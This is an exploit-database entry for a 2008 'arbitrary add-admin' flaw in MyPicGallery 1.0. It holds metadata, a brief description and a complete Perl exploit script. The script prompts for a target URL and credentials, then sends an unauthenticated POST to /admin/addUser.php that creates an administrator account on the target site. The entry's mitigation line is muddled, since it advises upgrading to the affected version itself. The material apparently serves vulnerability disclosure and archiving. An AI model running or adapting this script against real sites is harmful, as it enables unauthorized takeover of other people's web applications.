MyPicGallery 1.0 Arbitrary Add-Admin Exploit

vendor:

MyPicGallery

by:

t0pP8uZz

7.5

CVSS

HIGH

Arbitrary Add-Admin Exploit

N/A

CWE

Product Name: MyPicGallery

Affected Version From: 1

Affected Version To: 1

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

MyPicGallery 1.0 Arbitrary Add-Admin Exploit

MyPicGallery 1.0 is vulnerable to an arbitrary add-admin exploit. An attacker can exploit this vulnerability by sending a POST request to the addUser.php script with the desired username and password. This will create an admin account with the specified credentials.

Mitigation:

Upgrade to the latest version of MyPicGallery 1.0

Source

Exploit-DB raw data:

#!/usr/bin/perl

use strict;
use LWP::UserAgent;

print "-+--[ MyPicGallery 1.0 Arbitrary Add-Admin Exploit ]--+-\n";
print "-+--        Discovered && Coded By: t0pP8uZz        --+-\n";
print "-+-- Discovered On: 16 MAY 2008 / h4ck-y0u, milw0rm --+-\n";
print "-+--[ MyPicGallery 1.0 Arbitrary Add-Admin Exploit ]--+-\n";

print "\nEnter URL(http://site.com): ";
	chomp(my $url=<STDIN>);
	
print "\nEnter Username(create's a admin username): ";
	chomp(my $usr=<STDIN>);
	
print "\nEnter Password(create's a admin password): ";
	chomp(my $pwd=<STDIN>);
	
my $ua = LWP::UserAgent->new( agent => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" );
my $ob = $ua->post( $url."/admin/addUser.php?userID=admin", { "submit" => 1, # ugly?
															  "fullName"    => "null",
															  "userName"    => $usr,
															  "password"    => $pwd,
															  "conPassword" => $pwd,
															  "uType"       => "admin",
															  "email"       => "null\@null.com" } );

if($ob->is_success && index($ob->content, "added") != -1) {
	print "\nAdmin Account Added! Login at: ".$url."\n";
} else { print "\nExploit Failed! username already exists?"; }

# milw0rm.com [2008-05-18]